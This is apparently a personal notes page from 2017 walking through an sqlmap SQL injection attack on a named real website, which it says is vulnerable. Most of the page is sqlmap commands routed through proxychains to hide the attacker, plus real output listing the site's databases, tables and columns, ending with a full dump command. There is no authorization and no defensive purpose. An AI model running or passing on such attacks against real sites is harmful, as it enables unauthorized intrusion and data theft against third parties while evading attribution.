Created Thursday 07 December 2017
# Remember to use with Proxychains
# A great SQL injection automation tool
$ pacman -S sqlmap
# Find insecure web servers with the classic URL trick - append a single or double quote to a URL parameter
# Ex:
www.example.com?id=1'
Example Usage
# At the time of writing this, the following site is actually vulnerable
# http://www.romanianwriters.ro/s.php?id=1
Confirm Vulnerable
# Perform a scan against a URL with -u
$ proxychains sqlmap -u "http://www.romanianwriters.ro/s.php?id=1"
Discover Databases
# Its output will report which parameters are injectable
# Now that we know the server is vulnerable, we can discover its databases with --dbs
$ proxychains sqlmap -u "http://www.romanianwriters.ro/s.php?id=1" --dbs
# From the response I can see two databases are available:
- information_schema
- romanian_svc
Tables
# Let's look further into the romanian_svc database
$ proxychains sqlmap -u "http://www.romanianwriters.ro/s.php?id=1" --tables -D romanian_svc
# Here's the table response
[11 tables]
+------------------+
| ra_autori |
| ra_carti |
| ra_carti_autori |
| ra_carti_critics |
| ra_carti_pdf |
| ra_contact |
| ra_news |
| ra_news_pics |
| ra_sigle |
| ra_statics |
| ra_statics_pics |
+------------------+
Columns
# Now let's have a look at the columns of a table, ra_carti_critics for example
$ proxychains sqlmap -u "http://www.romanianwriters.ro/s.php?id=1" --columns -D romanian_svc -T ra_carti_critics
# And the response
+----------+--------------+
| Column | Type |
+----------+--------------+
| critic | varchar(240) |
| critic2 | varchar(240) |
| id | int(11) |
| id_carte | int(11) |
| text | text |
+----------+--------------+
Dump
# Let's have a look at the actual data
$ proxychains sqlmap -u "http://www.romanianwriters.ro/s.php?id=1" --dump -D romanian_svc -T ra_carti_critics
# Now, don't actually fire the above command - it's just a shitload of crappy content for their website
# But the execution is there^